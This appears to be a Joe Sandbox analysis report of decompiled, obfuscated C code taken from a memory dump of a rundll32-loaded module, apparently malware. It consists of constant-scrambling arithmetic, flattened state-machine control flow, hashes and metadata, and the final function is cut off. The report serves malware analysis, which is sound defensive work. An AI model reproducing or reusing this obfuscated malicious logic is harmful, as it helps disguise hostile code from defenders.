                                                                                                                      				_v1104 = _v1104 ^ 0x0006818d;
                                                                                                                      				_v1064 = 0xd65a00;
                                                                                                                      				_v1064 = _v1064 + 0x372a;
                                                                                                                      				_v1064 = _v1064 ^ 0x00dea864;
                                                                                                                      				_v1088 = 0x4d0087;
                                                                                                                      				_v1088 = _v1088 + 0xffffb4c7;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a5aafbb;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a1526df;
                                                                                                                      				_v1092 = 0x9c5ab3;
                                                                                                                      				_t308 = 0x3c;
                                                                                                                      				_v1092 = _v1092 / _t308;
                                                                                                                      				_v1092 = _v1092 >> 1;
                                                                                                                      				_v1092 = _v1092 ^ 0x000c3f19;
                                                                                                                      				_v1140 = 0x5b7912;
                                                                                                                      				_v1140 = _v1140 + 0xffff68b5;
                                                                                                                      				_t309 = 0x6d;
                                                                                                                      				_v1140 = _v1140 * 0xe;
                                                                                                                      				_v1140 = _v1140 >> 1;
                                                                                                                      				_v1140 = _v1140 ^ 0x02711af4;
                                                                                                                      				_v1120 = 0xf0336c;
                                                                                                                      				_v1120 = _v1120 + 0x850d;
                                                                                                                      				_v1120 = _v1120 << 3;
                                                                                                                      				_v1120 = _v1120 / _t309;
                                                                                                                      				_v1120 = _v1120 ^ 0x00151fd7;
                                                                                                                      				_v1112 = 0x1d5cd4;
                                                                                                                      				_v1112 = _v1112 << 7;
                                                                                                                      				_v1112 = _v1112 | 0x8feadd76;
                                                                                                                      				_v1112 = _v1112 << 0x10;
                                                                                                                      				_v1112 = _v1112 ^ 0xff743f21;
                                                                                                                      				_v1116 = 0x1a947a;
                                                                                                                      				_v1116 = _v1116 + 0x75f0;
                                                                                                                      				_v1116 = _v1116 << 0xa;
                                                                                                                      				_t310 = 0x5a;
                                                                                                                      				_v1116 = _v1116 * 0x6e;
                                                                                                                      				_v1116 = _v1116 ^ 0x79e60e9e;
                                                                                                                      				_v1124 = 0xbb349e;
                                                                                                                      				_v1124 = _v1124 / _t310;
                                                                                                                      				_v1124 = _v1124 << 8;
                                                                                                                      				_t311 = 0x54;
                                                                                                                      				_v1124 = _v1124 / _t311;
                                                                                                                      				_v1124 = _v1124 ^ 0x000c08c5;
                                                                                                                      				_v1080 = 0xb1ec11;
                                                                                                                      				_v1080 = _v1080 | 0x4ad04b34;
                                                                                                                      				_v1080 = _v1080 ^ 0x4af1877a;
                                                                                                                      				_v1072 = 0x6450ea;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bd0ca6d;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bbfa4d9;
                                                                                                                      				_v1100 = 0x193680;
                                                                                                                      				_v1100 = _v1100 + 0xffff84f1;
                                                                                                                      				_t312 = 0x39;
                                                                                                                      				_v1100 = _v1100 / _t312;
                                                                                                                      				_v1100 = _v1100 ^ 0x185ca7c1;
                                                                                                                      				_v1100 = _v1100 ^ 0x1855126a;
                                                                                                                      				_v1108 = 0xe40e26;
                                                                                                                      				_v1108 = _v1108 + 0xffff805f;
                                                                                                                      				_v1108 = _v1108 << 4;
                                                                                                                      				_v1108 = _v1108 ^ 0x0e3caf6d;
                                                                                                                      				do {
                                                                                                                      					while(_t266 != 0x35a8362) {
                                                                                                                      						if(_t266 == 0x706ecca) {
                                                                                                                      							E0018E498(_v1072, _v1100, _v1108,  &_v1040);
                                                                                                                      						} else {
                                                                                                                      							if(_t266 == 0xd630330) {
                                                                                                                      								_push( &_v520);
                                                                                                                      								_push( &_v1040);
                                                                                                                      								_push(_v1080);
                                                                                                                      								_t255 = E00178D95(_v1116, _v1124, __eflags);
                                                                                                                      								_t315 =  &(_t315[3]);
                                                                                                                      								__eflags = _t255;
                                                                                                                      								_t302 =  !=  ? 1 : _t302;
                                                                                                                      								_t266 = 0x706ecca;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t266 == 0xdb8f695) {
                                                                                                                      									E001912A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
                                                                                                                      									_t315 =  &(_t315[3]);
                                                                                                                      									_t266 = 0xe8d55c7;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									_t322 = _t266 - 0xe8d55c7;
                                                                                                                      									if(_t266 != 0xe8d55c7) {
                                                                                                                      										goto L10;
                                                                                                                      									} else {
                                                                                                                      										_push(_v1068);
                                                                                                                      										_push(_v1096);
                                                                                                                      										_push(0x1710cc);
                                                                                                                      										_t258 = E0017AB66(_v1136, _v1076, _t322);
                                                                                                                      										_t259 =  *0x19520c; // 0x0
                                                                                                                      										_t261 =  *0x19520c; // 0x0
                                                                                                                      										E0017E7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
                                                                                                                      										E0017AE03(_v1140, _v1120, _v1112, _t258);
                                                                                                                      										_t315 =  &(_t315[0xd]);
                                                                                                                      										_t266 = 0xd630330;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t302;
                                                                                                                      					}
                                                                                                                      					_t266 = 0xdb8f695;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t266 - 0x3cedcca;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: bc86d0a15e28c9728bd8a82dc965b103912d59004410dc4cfc07c8461bbef795
                                                                                                                      • Instruction ID: 4d7ac505ac071bc92dd241f070fa85dbc24daa910bfe3fa088f1a1093dfb3959
                                                                                                                      • Opcode Fuzzy Hash: bc86d0a15e28c9728bd8a82dc965b103912d59004410dc4cfc07c8461bbef795
                                                                                                                      • Instruction Fuzzy Hash: 27B122B15083409BD354CF66C88994FFBF1FBC8758F508A1DF69A86260D7B58909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E00178D95(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t261;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				void* _t269;
                                                                                                                      				intOrPtr* _t290;
                                                                                                                      				void* _t291;
                                                                                                                      
                                                                                                                      				_t290 = _t291 - 0x6c;
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x7c)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x74)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t231);
                                                                                                                      				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
                                                                                                                      				 *_t290 = 0x81872b;
                                                                                                                      				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
                                                                                                                      				 *(_t290 + 0x2c) = 0x807aaf;
                                                                                                                      				_t265 = 0x3e;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
                                                                                                                      				 *(_t290 + 0x50) = 0x6f2162;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
                                                                                                                      				 *(_t290 + 0x58) = 0xe574ec;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
                                                                                                                      				 *(_t290 + 0x20) = 0xd3956a;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
                                                                                                                      				 *(_t290 + 0x14) = 0xfcd290;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
                                                                                                                      				 *(_t290 + 0x64) = 0x85109;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
                                                                                                                      				 *(_t290 + 0x3c) = 0x71f5e0;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
                                                                                                                      				 *(_t290 + 0x28) = 0x899f0e;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
                                                                                                                      				 *(_t290 + 0x54) = 0x38c331;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
                                                                                                                      				_t266 = 0x30;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
                                                                                                                      				 *(_t290 + 0x38) = 0xd05f1;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
                                                                                                                      				 *(_t290 + 0x30) = 0x1cfed4;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
                                                                                                                      				 *(_t290 + 0x40) = 0x1c7373;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
                                                                                                                      				 *(_t290 + 0x18) = 0x2a4c72;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
                                                                                                                      				 *(_t290 + 0x4c) = 0xadab42;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
                                                                                                                      				 *(_t290 + 0x5c) = 0x1c041c;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
                                                                                                                      				 *(_t290 + 0x44) = 0x9cf7da;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
                                                                                                                      				_t267 = 3;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
                                                                                                                      				 *(_t290 + 0x60) = 0x461ba6;
                                                                                                                      				_t268 = 0xd;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
                                                                                                                      				 *(_t290 + 0x68) = 0x8d460c;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
                                                                                                                      				 *(_t290 + 0x34) = 0x2e04ca;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
                                                                                                                      				 *(_t290 + 0x10) = 0xbf0768;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
                                                                                                                      				 *(_t290 + 0xc) = 0xd072fa;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
                                                                                                                      				 *(_t290 + 0x1c) = 0x9f8a7b;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
                                                                                                                      				 *(_t290 + 0x24) = 0xd784f2;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
                                                                                                                      				 *(_t290 + 0x48) = 0xfdbd11;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
                                                                                                                      				_push( *(_t290 + 0x3c));
                                                                                                                      				_push( *(_t290 + 0x64));
                                                                                                                      				_push( *(_t290 + 0x14));
                                                                                                                      				_push( *(_t290 + 0x20));
                                                                                                                      				_t269 = 0x1e;
                                                                                                                      				E00191310(_t269, _t290 - 0x20);
                                                                                                                      				E00191310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
                                                                                                                      				E00191310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
                                                                                                                      				E001808A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
                                                                                                                      				E001808A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
                                                                                                                      				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
                                                                                                                      				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
                                                                                                                      				_t261 = E0018E2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				return  ~_t261 + 1;
                                                                                                                      			}












                                                                                                                      0x00179063
                                                                                                                      0x00179064
                                                                                                                      0x00179080
                                                                                                                      0x0017909c
                                                                                                                      0x001790b7
                                                                                                                      0x001790cf
                                                                                                                      0x001790d7
                                                                                                                      0x001790e0
                                                                                                                      0x001790e9
                                                                                                                      0x001790f7
                                                                                                                      0x00179108
                                                                                                                      0x00179112
                                                                                                                      0x00179119

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: 8ec35f4904c74569715fadaa7e1edfbe23c9f025a8fe1cb21128c914c2a62c1c
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 73B1DB7140038D9BDF59DF61C98A9CE3BB2FF54348F108219FA1A96260D7B5CA99CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0017B41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t136;
                                                                                                                      				intOrPtr _t140;
                                                                                                                      				void* _t146;
                                                                                                                      				signed int _t159;
                                                                                                                      				signed int _t160;
                                                                                                                      				signed int _t161;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t166;
                                                                                                                      
                                                                                                                      				_push(1);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(1);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t125);
                                                                                                                      				_v56 = 0xe46139;
                                                                                                                      				_t166 =  &(( &_v60)[7]);
                                                                                                                      				_v56 = _v56 + 0x2728;
                                                                                                                      				_v56 = _v56 ^ 0xfa290e75;
                                                                                                                      				_t163 = 0;
                                                                                                                      				_v56 = _v56 >> 4;
                                                                                                                      				_t146 = 0x6cc7f8c;
                                                                                                                      				_v56 = _v56 ^ 0x0fa05392;
                                                                                                                      				_v60 = 0xdd8405;
                                                                                                                      				_v60 = _v60 + 0xffff7544;
                                                                                                                      				_t159 = 0x13;
                                                                                                                      				_v60 = _v60 / _t159;
                                                                                                                      				_t160 = 0x4a;
                                                                                                                      				_v60 = _v60 * 0x44;
                                                                                                                      				_v60 = _v60 ^ 0x03147b15;
                                                                                                                      				_v40 = 0xb1f638;
                                                                                                                      				_v40 = _v40 / _t160;
                                                                                                                      				_v40 = _v40 + 0xfdde;
                                                                                                                      				_v40 = _v40 ^ 0x000bffc0;
                                                                                                                      				_v20 = 0xc1e326;
                                                                                                                      				_v20 = _v20 << 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0f1113ff;
                                                                                                                      				_v24 = 0x9dff8e;
                                                                                                                      				_v24 = _v24 << 5;
                                                                                                                      				_v24 = _v24 ^ 0x13be58e4;
                                                                                                                      				_v44 = 0x26f48e;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 ^ 0x0002f448;
                                                                                                                      				_v48 = 0xa078f9;
                                                                                                                      				_t161 = 0x1c;
                                                                                                                      				_v48 = _v48 * 0xe;
                                                                                                                      				_v48 = _v48 ^ 0x04e4b6a4;
                                                                                                                      				_v48 = _v48 ^ 0x0c2dbe80;
                                                                                                                      				_v52 = 0xb739f4;
                                                                                                                      				_v52 = _v52 ^ 0x18b1fcfd;
                                                                                                                      				_v52 = _v52 ^ 0x2d0276e6;
                                                                                                                      				_v52 = _v52 ^ 0x3502a25a;
                                                                                                                      				_v28 = 0x1e50a5;
                                                                                                                      				_v28 = _v28 / _t161;
                                                                                                                      				_v28 = _v28 ^ 0x0008472d;
                                                                                                                      				_v32 = 0x99faaf;
                                                                                                                      				_v32 = _v32 + 0xfffffde3;
                                                                                                                      				_v32 = _v32 ^ 0x0091a9c4;
                                                                                                                      				_v36 = 0x23e8f3;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x5a;
                                                                                                                      				_v36 = _v36 ^ 0x064f5444;
                                                                                                                      				_v8 = 0xf9c016;
                                                                                                                      				_v8 = _v8 | 0x76d0de1d;
                                                                                                                      				_v8 = _v8 ^ 0x76f7039e;
                                                                                                                      				_v12 = 0x650156;
                                                                                                                      				_v12 = _v12 >> 5;
                                                                                                                      				_v12 = _v12 ^ 0x000fa496;
                                                                                                                      				_v16 = 0x5361c2;
                                                                                                                      				_v16 = _v16 ^ 0x712c2ae6;
                                                                                                                      				_v16 = _v16 ^ 0x71790bc8;
                                                                                                                      				_t162 = _v4;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0x2367fc3) {
                                                                                                                      						if(_t146 == 0x555e5ab) {
                                                                                                                      							E001913B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
                                                                                                                      							_t166 =  &(_t166[9]);
                                                                                                                      							_t146 = 0xbed5482;
                                                                                                                      							_t163 =  !=  ? 1 : _t163;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0x6cc7f8c) {
                                                                                                                      								_t146 = 0x9230dbb;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0x9230dbb) {
                                                                                                                      									_t140 = E00179685(_t146);
                                                                                                                      									_t162 = _t140;
                                                                                                                      									if(_t140 != 0xffffffff) {
                                                                                                                      										_t146 = 0x2367fc3;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t146 != 0xbed5482) {
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										E00184DAD(_v36, _v8, _v4, _v12, _v16);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L7:
                                                                                                                      						return _t163;
                                                                                                                      					}
                                                                                                                      					_t136 = E0018FB2B(_v40,  &_v4, _v20, _v24, _t162);
                                                                                                                      					_t166 =  &(_t166[3]);
                                                                                                                      					if(_t136 == 0) {
                                                                                                                      						_t146 = 0x362db31;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t146 = 0x555e5ab;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L7;
                                                                                                                      					L15:
                                                                                                                      				} while (_t146 != 0x362db31);
                                                                                                                      				goto L7;
                                                                                                                      			}

                                                                                                                      0x0017b5bb
                                                                                                                      0x0017b5c5
                                                                                                                      0x0017b5cd
                                                                                                                      0x0017b5d5
                                                                                                                      0x0017b5dd
                                                                                                                      0x0017b5e5
                                                                                                                      0x0017b5e9
                                                                                                                      0x0017b5e9
                                                                                                                      0x0017b5f7
                                                                                                                      0x0017b67d
                                                                                                                      0x0017b682
                                                                                                                      0x0017b685
                                                                                                                      0x0017b68c
                                                                                                                      0x00000000
                                                                                                                      0x0017b5f9
                                                                                                                      0x0017b5ff
                                                                                                                      0x0017b653
                                                                                                                      0x00000000
                                                                                                                      0x0017b601
                                                                                                                      0x0017b607
                                                                                                                      0x0017b643
                                                                                                                      0x0017b648
                                                                                                                      0x0017b64d
                                                                                                                      0x0017b64f
                                                                                                                      0x00000000
                                                                                                                      0x0017b64f
                                                                                                                      0x0017b609
                                                                                                                      0x0017b60f
                                                                                                                      0x00000000
                                                                                                                      0x0017b615
                                                                                                                      0x0017b629
                                                                                                                      0x0017b62e
                                                                                                                      0x0017b60f
                                                                                                                      0x0017b607
                                                                                                                      0x0017b5ff
                                                                                                                      0x0017b632
                                                                                                                      0x0017b63a
                                                                                                                      0x0017b63a
                                                                                                                      0x0017b6a5
                                                                                                                      0x0017b6aa
                                                                                                                      0x0017b6af
                                                                                                                      0x0017b6bb
                                                                                                                      0x00000000
                                                                                                                      0x0017b6b1
                                                                                                                      0x0017b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0017b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0017b6c0
                                                                                                                      0x0017b6c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: fb7fa9d96f43e1a8715b51d9ac10e2f08c4e5078d5039cb2a35bc4d0e9bd5596
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: F36110711083419BC758CE21999A82BBAF2FBC4758F548A1DF6969A260C3B1CA59CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018C38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t139;
                                                                                                                      				void* _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				void* _t157;
                                                                                                                      				void* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				void* _t173;
                                                                                                                      				signed int* _t175;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t173 = __edx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t139);
